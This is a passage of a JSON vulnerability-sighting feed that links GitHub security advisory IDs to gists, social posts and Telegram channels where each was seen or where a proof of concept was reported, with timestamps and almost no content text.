"https://gist.github.com/alon710/7c54eba19cd97d405397b38bde10ad0d", "content": "", "creation_timestamp": "2026-08-22T02:31:53.709007Z"}, {"uuid": "5511d31c-41f3-42cc-9c0a-014578afeb90", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8gq3-vp5j-2grp", "type": "seen", "source": "https://gist.github.com/alon710/1b32b1920b2d1520540a780d7d0490bd", "content": "", "creation_timestamp": "2026-08-22T01:32:06.881645Z"}, {"uuid": "b5edfc75-7682-4530-a3d8-7205216e5e6f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-gj76-h2ch-5m76", "type": "seen", "source": "https://bsky.app/profile/webknjaz.mastodon.social.ap.brid.gy/post/3mtn27bxi3wh2", "content": "", "creation_timestamp": "2026-08-22T00:43:32.577136Z"}, {"uuid": "e781cf5d-e35b-46ac-9ee0-0f01949b3f0f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-gj76-h2ch-5m76", "type": "seen", "source": "https://bsky.app/profile/webknjaz.me/post/3mtn27ckwcs2g", "content": "", "creation_timestamp": "2026-08-22T00:43:30.000044Z"}, {"uuid": "78827ddf-f32e-4a8e-8f2c-4e69679687cd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5h77-88j3-r659", "type": "seen", "source": "https://gist.github.com/alon710/208f516547042f21996adfe309317a63", "content": "", "creation_timestamp": "2026-08-22T00:31:35.545797Z"}, {"uuid": "9830329e-7f9f-479c-b80e-e6d5ceecdfaa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-2cp2-2r3c-7p7r", "type": "seen", "source": "https://gist.github.com/alon710/fe62230d534aaa9446cebd76e965c0c0", "content": "", "creation_timestamp": "2026-08-21T23:32:10.405911Z"}, {"uuid": "11453e61-d7e4-45df-ba95-6efabd42129f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-66mm-25pp-rfff", "type": "seen", "source": "https://bsky.app/profile/thestandup.bsky.social/post/3mtmw5pmwz62y", "content": "", "creation_timestamp": "2026-08-21T23:30:59.315842Z"}, {"uuid": "a2c0927a-b506-44d1-aae3-0b10a8a1fd45", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-MHH3-45V6-6VMH", "type": "seen", "source": "https://t.me/pphm_HackerNews/1718", "content": "", "creation_timestamp": "2026-08-21T23:00:10.700377Z"}, {"uuid": "009031b3-24dc-47e2-8f93-d1ddf879aec6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-RXW2-PC8J-VXWM", "type": "seen", "source": "https://t.me/pphm_HackerNews/1828", "content": "", "creation_timestamp": "2026-08-21T23:00:10.434825Z"}, {"uuid": "d876e229-7362-4556-be14-c140196ed665", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-MHMQ-MMQJ-2V39", "type": "seen", "source": "https://t.me/pphm_HackerNews/1832", "content": "", "creation_timestamp": "2026-08-21T23:00:09.456082Z"}, {"uuid": "72bb3653-516a-4435-b232-e1ac901169f6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-GV7G-JM28-CR3M", "type": "seen", "source": "https://t.me/pphm_HackerNews/2322", "content": "", "creation_timestamp": "2026-08-21T23:00:07.591823Z"}, {"uuid": "028801a1-33c4-4e55-ba82-d8333ce04402", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-P9R8-2Q67-FP86", "type": "seen", "source": "https://t.me/pphm_HackerNews/2782", "content": "", "creation_timestamp": "2026-08-21T23:00:05.438964Z"}, {"uuid": "0ca41f21-e7d6-409c-98a6-86d9a97c58b9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-66mm-25pp-rfff", "type": "seen", "source": "https://gist.github.com/alon710/20a50aebfd35291a76583a04e09e8467", "content": "", "creation_timestamp": "2026-08-21T22:31:20.586671Z"}, {"uuid": "f6deaa1c-4b6e-4a91-b56a-bdbab5704669", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-2943-5xfg-gq5f", "type": "seen", "source": "https://gist.github.com/alon710/c3aaed90ea510257bc4b82da4dd81787", "content": "", "creation_timestamp": "2026-08-21T21:32:06.119407Z"}, {"uuid": "81dd675e-d01a-4907-b089-d765c467ed5b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7m52-jw36-44r3", "type": "seen", "source": "https://bsky.app/profile/thestandup.bsky.social/post/3mthyn7r5at2y", "content": "", "creation_timestamp": "2026-08-20T00:32:08.079557Z"}, {"uuid": "1468ca3b-6664-4b57-97bd-093b7e392629", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-R9MR-M37C-5FR3", "type": "published-proof-of-concept", "source": "https://t.me/bdufstecru/3391", "content": "", "creation_timestamp": "2026-08-20T00:00:28.160883Z"}, {"uuid": "3048a241-2cbd-4994-b13c-e9e0003d3d80", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-H6C2-X2M2-MWHF", "type": "published-proof-of-concept", "source": "https://t.me/NinjaSecurity/280", "content": "", "creation_timestamp": "2026-08-20T00:00:09.162031Z"}, {"uuid": "0785f652-463f-4da2-8743-29b573d04400", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-X574-M823-4X7W", "type": "published-proof-of-concept", "source": "https://t.me/NinjaSecurity/12", "content": "", "creation_timestamp": "2026-08-20T00:00:05.762149Z"}, {"uuid": "9e91a6fd-8778-40e0-9fe2-5f9c46cc4fb2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-rxjr-6c9q-h67x", "type": "seen", "source": "https://bsky.app/profile/thestandup.bsky.social/post/3mthnpgazgt2v", "content": "", "creation_timestamp": "2026-08-19T21:16:30.978164Z"}, {"uuid": "a8f23792-a81e-4e8c-86f9-cdc090568e45", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-X574-M823-4X7W", "type": "seen", "source": "https://t.me/NinjaSecurity/12", "content": "", "creation_timestamp": "2026-08-19T21:00:05.191229Z"}, {"uuid": "1a281d81-0260-4742-84a0-f27639bb2543", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-X574-M823-4X7W", "type": "seen", "source": "https://t.me/NinjaSecurity/45", "content": "", "creation_timestamp": "2026-08-19T21:00:04.812518Z"}, {"uuid": "61fa4714-aad4-4432-96e0-d5ba93d9ffb7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-X574-M823-4X7W", "type": "seen", "source": "https://t.me/NinjaSecurity/102", "content": "", "creation_timestamp": "2026-08-19T21:00:04.165341Z"}, {"uuid": "2969ccbb-abf1-467e-b499-864b6e9e6449", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-X574-M823-4X7W", "type": "seen", "source": "https://t.me/NinjaSecurity/118", "content": "", "creation_timestamp": "2026-08-19T21:00:04.017040Z"}, {"uuid": "f424d18c-6dbe-491b-bca4-5be1fb18de75", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-H6C2-X2M2-MWHF", "type": "seen", "source": "https://t.me/NinjaSecurity/280", "content": "", "creation_timestamp": "2026-08-19T21:00:03.197048Z"}, {"uuid": "87f911df-7552-4cdc-b282-8bf43fb83408", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-cfh6-pv5c-38jv", "type": "seen", "source": "https://gist.github.com/alon710/efd05c94aa8a7f9db39650de6553e415", "content": "", "creation_timestamp": "2026-08-19T06:44:38.333299Z"}, {"uuid": "d14e306d-81d7-4679-8e8d-c3e17ee3ba95", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-6c8m-q6g9-vrw3", "type": "seen", "source": "https://gist.github.com/alon710/d3bb7a8e835fd653e6c886cd85f28aa2", "content": "", "creation_timestamp": "2026-08-19T06:44:38.224878Z"}, {"uuid": "782b0a8a-f9f5-41e2-a291-58fe9706929e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-mqjf-5f49-2fjh", "type": "seen", "source": "https://bsky.app/profile/kotosecurity.bsky.social/post/3mtg2lu7yrt2c", "content": "", "creation_timestamp": "2026-08-19T06:01:51.212998Z"}, {"uuid": "6cfe264a-5891-4c7d-9a31-5f0ace6470b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-cfh6-pv5c-38jv", "type": "seen", "source": "https://bsky.app/profile/thestandup.bsky.social/post/3mtfky3fhnu2w", "content": "", "creation_timestamp": "2026-08-19T01:22:21.312359Z"}, {"uuid": "a6445550-272c-483e-9cc5-f5e11b533ff5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-6c8m-q6g9-vrw3", "type": "seen", "source": "https://bsky.app/profile/kyisaiah47.kynth.studio/post/3mtfkonbzug2c", "content": "", "creation_timestamp": "2026-08-19T01:17:04.592720Z"}, {"uuid": "0d676f1d-0638-4c44-95f0-e4fad8c2d06f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7gww-x7fh-jf9j", "type": "seen", "source": "https://bsky.app/profile/thestandup.bsky.social/post/3mtf7qjpq7g2g", "content": "", "creation_timestamp": "2026-08-18T22:01:16.274800Z"}, {"uuid": "3408e8ba-a1b7-486a-af39-4629f52ff10f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-w5hq-g745-h8pq", "type": "seen", "source": "https://gist.github.com/klemmanton-lgtm/851652e5d9c31db2c2148d15fd9e704c", "content": "", "creation_timestamp": "2026-08-17T10:21:36.743878Z"}, {"uuid": "aaa26058-c48b-4eb6-85a6-a96765885719", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-89xv-2m56-2m9x", "type": "seen", "source": "https://gist.github.com/klemmanton-lgtm/851652e5d9c31db2c2148d15fd9e704c", "content": "", "creation_timestamp": "2026-08-17T10:21:36.709387Z"}, {"uuid": "e6f1b678-0ca4-4893-a07c-a6a12e59e1f4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-6gpp-xcg3-4w24", "type": "seen", "source": "https://gist.github.com/klemmanton-lgtm/851652e5d9c31db2c2148d15fd9e704c", "content": "", "creation_timestamp": "2026-08-17T10:21:36.675451Z"}, {"uuid": "8f70865f-bd3c-42d9-805a-ea973d22f506", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-m99w-x7hq-7vfj", "type": "seen", "source": "https://gist.github.com/klemmanton-lgtm/851652e5d9c31db2c2148d15fd9e704c", "content": "", "creation_timestamp": "2026-08-17T10:21:36.637703Z"}, {"uuid": "6cc44405-17eb-400e-afcf-0cd7837bdef1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-p9j2-gv94-2wf4", "type": "seen", "source": "https://gist.github.com/klemmanton-lgtm/851652e5d9c31db2c2148d15fd9e704c", "content": "", "creation_timestamp": "2026-08-17T10:21:36.614109Z"}, {"uuid": "acf78c93-8c6b-4ffa-aa80-6c3b9344bcf7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-r28c-9q8g-f849", "type": "seen", "source": "https://gist.github.com/klemmanton-lgtm/851652e5d9c31db2c2148d15fd9e704c", "content": "", "creation_timestamp": "2026-08-17T10:21:36.573517Z"}, {"uuid": "ee8eafb9-632f-46c9-98a3-8d553b0cb8f4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-6g55-p6wh-862q", "type": "seen", "source": "https://gist.github.com/klemmanton-lgtm/851652e5d9c31db2c2148d15fd9e704c", "content": "", "creation_timestamp": "2026-08-17T10:21:36.546205Z"}, {"uuid": "0d114b2b-d410-490e-8c10-dfe660c2e30b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-vwf4-m7j8-wcjf", "type": "seen", "source": "https://infosec.exchange/users/shadowserver/statuses/117107074861858582", "content": "", "creation_timestamp": "2026-08-16T20:29:14.846270Z"}, {"uuid": "444421a1-f590-4215-ad27-d9afc5a3a67d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-743w-g9pf-8p94", "type": "seen", "source": "https://gist.github.com/CaptBoykin/fb932b14c932323583161460666e60da", "content": "", "creation_timestamp": "2026-08-13T22:43:46.808000Z"}, {"uuid": "486c3a30-5dc6-43c4-b4ef-ecfee49e4582", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-m8mr-9hwf-7v3f", "type": "seen", "source": "https://gist.github.com/CaptBoykin/fb932b14c932323583161460666e60da", "content": "", "creation_timestamp": "2026-08-13T22:43:46.765755Z"}, {"uuid": "a600c77d-0a60-411b-a486-951bd3d20cb3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-qm8r-q3h4-c3vw", "type": "seen", "source": "https://gist.github.com/CaptBoykin/fb932b14c932323583161460666e60da", "content": "", "creation_timestamp": "2026-08-13T22:43:46.732502Z"}, {"uuid": "aae1be95-d28d-4d92-9017-a0f620ff4aec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7jmf-5vcp-f672", "type": "seen", "source": "https://gist.github.com/CaptBoykin/fb932b14c932323583161460666e60da", "content": "", "creation_timestamp": "2026-08-13T22:43:46.697262Z"}, {"uuid": "a69fa082-3516-46dd-9d75-84986cf8315b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8vx6-432p-h62q", "type": "seen", "source": "https://gist.github.com/CaptBoykin/fb932b14c932323583161460666e60da", "content": "", "creation_timestamp": "2026-08-13T22:43:46.650478Z"}, {"uuid": "e1f87cff-a100-4890-8398-5a303bde95c7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-j8xf-5fw2-f99q", "type": "seen", "source": "https://gist.github.com/CaptBoykin/fb932b14c932323583161460666e60da", "content": "", "creation_timestamp": "2026-08-13T22:43:46.602507Z"}, {"uuid": "6923ebb2-9383-45ca-b244-f72a5d5df82c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-rm3m-9mvw-68fh", "type": "seen", "source": "https://gist.github.com/CaptBoykin/fb932b14c932323583161460666e60da", "content": "", "creation_timestamp": "2026-08-13T22:43:46.564821Z"}, {"uuid": "cdb0a7b1-476d-4b17-8541-89f386cf27bc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-mxcg-p696-rm94", "type": "seen", "source": "https://gist.github.com/CaptBoykin/fb932b14c932323583161460666e60da", "content": "", "creation_timestamp": "2026-08-13T22:43:46.519603Z"}, {"uuid": "c74f5b2a-db6d-4abf-9803-9084fb02bdba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-6w78-q5vm-rfmh", "type": "seen", "source": "https://gist.github.com/CaptBoykin/fb932b14c932323583161460666e60da", "content": "", "creation_timestamp": "2026-08-13T22:43:46.474668Z"}, {"uuid": "1450ec05-a9b8-41ff-bc93-4966dab54008", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-jhg2-mvfw-xfpc", "type": "seen", "source": "https://gist.github.com/CaptBoykin/fb932b14c932323583161460666e60da", "content": "", "creation_timestamp": "2026-08-13T22:43:46.429936Z"}, {"uuid": "61ca5ab9-67d6-4329-b26d-7f7c3bbcff05", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-p28v-f755-9qrg", "type": "seen", "source": "https://gist.github.com/alon710/9ad8f19dc4256e5aad5d6b3105b603da", "content": "", "creation_timestamp": "2026-08-13T21:32:39.518191Z"}, {"uuid": "dd95c111-3ee8-4f80-b064-1983c9c55b9f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-87x5-vmc3-756j", "type": "seen", "source": "https://gist.github.com/alon710/8cc39c03d7f0aab8c747b6a46222fd6c", "content": "", "creation_timestamp": "2026-08-13T19:32:34.181888Z"}, {"uuid": "3cb6aed9-3fd9-45ca-9cd2-ea8b1532bcd9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-48p8-g2fx-3wwm", "type": "seen", "source": "https://gist.github.com/alon710/ee760ed8dd4e3944f68b62f514473cdc", "content": "", "creation_timestamp": "2026-08-13T17:32:46.812408Z"}, {"uuid": "55ef919f-5edd-4b05-b041-0cd66541f813", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "ghsa-rc23-xxgq-x27g", "type": "seen", "source": "https://gist.github.com/konard/f7c4c74a81209870defba91a1c40128f", "content": "", "creation_timestamp": "2026-08-13T16:53:08.266900Z"}, {"uuid": "221deed1-9e9f-4899-99ea-fed65a6d0edf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-h7p7-w5gc-xj3w", "type": "seen", "source": "https://gist.github.com/alon710/d833b9431a8f61aeff2a0496f83968ee", "content": "", "creation_timestamp": "2026-08-13T16:32:36.630585Z"}, {"uuid": "53b61593-162d-40a1-9c6d-e20eb5e918f0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-RM43-82J9-R4MJ", "type": "seen", "source": "https://gist.github.com/alon710/d62f1422f9dac4c6a1fc5e9b8b380828", "content": "", "creation_timestamp": "2026-08-13T15:33:17.892734Z"}, {"uuid": "9c30896a-dd10-4a2d-bfb4-250c77e51e4b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8vr3-7mxf-gx8w", "type": "seen", "source": "https://infosec.exchange/users/decio/statuses/117088692616270994", "content": "", "creation_timestamp": "2026-08-13T14:34:22.819228Z"}, {"uuid": "a7b692f8-e65a-4d13-9567-9dd88aea9658", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-VWF4-M7J8-WCJF", "type": "published-proof-of-concept", "source": "Telegram/_ZtTgk35S8DFYm2bUVjFV_qqtPnGYEzTcbCUrks9IGhgQhA", "content": "", "creation_timestamp": "2026-08-13T00:00:43.929675Z"}, {"uuid": "6d42c3cf-e3fc-454f-bbfb-47f0262af82e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-JM29-P7HH-VJHV", "type": "published-proof-of-concept", "source": "https://t.me/bdufstecru/3378", "content": "", "creation_timestamp": "2026-08-13T00:00:08.816215Z"}, {"uuid": "d482e77b-b269-4bd8-b3db-1c3f84a68f5b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-X692-Q9X7-8C3F", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/97769", "content": "", "creation_timestamp": "2026-08-13T00:00:06.749426Z"}, {"uuid": "707da786-daec-4b7f-818b-3b1cb05f4cce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-cxgv-hp74-jj7r", "type": "seen", "source": "https://bsky.app/profile/thestandup.bsky.social/post/3mswc4s4x6u2w", "content": "", "creation_timestamp": "2026-08-12T23:33:59.327918Z"}, {"uuid": "507ad593-8d13-434a-9fc6-ecc784701ae9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-w62w-66v9-vvgv", "type": "seen", "source": "https://gist.github.com/alon710/57586b5d8bd6ec2753b002d5acf877e5", "content": "", "creation_timestamp": "2026-08-12T22:31:56.601789Z"}, {"uuid": "a5425d49-f2bb-4fe4-b4da-26729465f2f9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-jwjp-4649-v8jp", "type": "seen", "source": "https://gist.github.com/alon710/888eb8510aa54f9402838aff0f641752", "content": "", "creation_timestamp": "2026-08-12T21:32:04.433253Z"}, {"uuid": "83cfb9f3-2a72-4fd0-be6f-41dbfd106830", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-pfvm-w89x-94jw", "type": "seen", "source": "https://gist.github.com/alon710/05e3ea6ef79e0a47d082b88eec33ae87", "content": "", "creation_timestamp": "2026-08-12T20:31:49.649204Z"}, {"uuid": "1285038c-0776-4859-bd25-713fb62528ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-X692-Q9X7-8C3F", "type": "seen", "source": "https://t.me/GithubRedTeam/97769", "content": "", "creation_timestamp": "2026-08-12T19:00:03.614293Z"}, {"uuid": "b13998a2-8f08-46d5-8f7c-028f6e8a24ac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8JQP-QV73-395R", "type": "seen", "source": "Telegram/_SPO_6iT-d8-bIQWZXI60t6OwvPUIqsHGwkcNiX5JYtOrng", "content": "", "creation_timestamp": "2026-05-19T12:39:14.000000Z"}, {"uuid": "5588fb74-80e5-419b-9505-d3e5ced1f239", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-992F-XH8R-JG2F", "type": "published-proof-of-concept", "source": "https://t.me/HackingTeamGrupoOfficial/49396", "content": "", "creation_timestamp": "2026-09-25T06:40:39.000000Z"}, {"uuid": "2d40cb4f-cc2b-4ba6-832e-9c9de7305f67", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7HP8-65CH-5WHP", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/103110", "content": "", "creation_timestamp": "2026-09-23T06:00:14.000000Z"}, {"uuid": "db73bef4-6e66-46b6-8870-cff535544611", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8qqm-fp2q-v734", "type": "seen", "source": "https://bsky.app/profile/malwareobserver.bsky.social/post/3mre2ahctmm2e", "content": "\ud83d\udc1b VULNERABILITIES CVE Notify: \ud83d\udea8 [CVE-2026-65604](https://github.com/zalando/skipper/security/advisories/GHSA-8qqm-fp2q-v734)\nSkip...\nhttps://github.com/zalando/skipper/security/advisories/GHSA-8qqm-fp2q-v734 #ZeroDay #PatchManagement #Vulnerability", "creation_timestamp": "2026-07-23T23:59:46.167244Z"}, {"uuid": "31cc16d4-5c21-4f87-ada9-c51fd172a455", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-VHM9-85GW-X335", "type": "seen", "source": "Telegram/_vYx5PfUbcVNyQqU1JMebKoUfxBECmDURJ_i-7wEklwQ5pw", "content": "", "creation_timestamp": "2026-09-25T09:23:24.000000Z"}, {"uuid": "34dac0b3-8a13-4aaa-adcc-a91c235e6dd3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-mwwr-p57h-56pf", "type": "seen", "source": "https://gist.github.com/alon710/dc5aa94f453805ed82e51ccb8dad1bc3", "content": "", "creation_timestamp": "2026-09-25T12:30:32.000000Z"}, {"uuid": "9070e80c-db4c-406b-aff4-a98359d03114", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-j4g5-xg6p-5hpx", "type": "seen", "source": "https://gist.github.com/naif-alfardan/8a69e0648e11b07abe63f949346179c1", "content": "", "creation_timestamp": "2026-09-25T12:28:41.000000Z"}, {"uuid": "53ad00ec-2362-49ed-9fae-8e2e85d6b76c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", 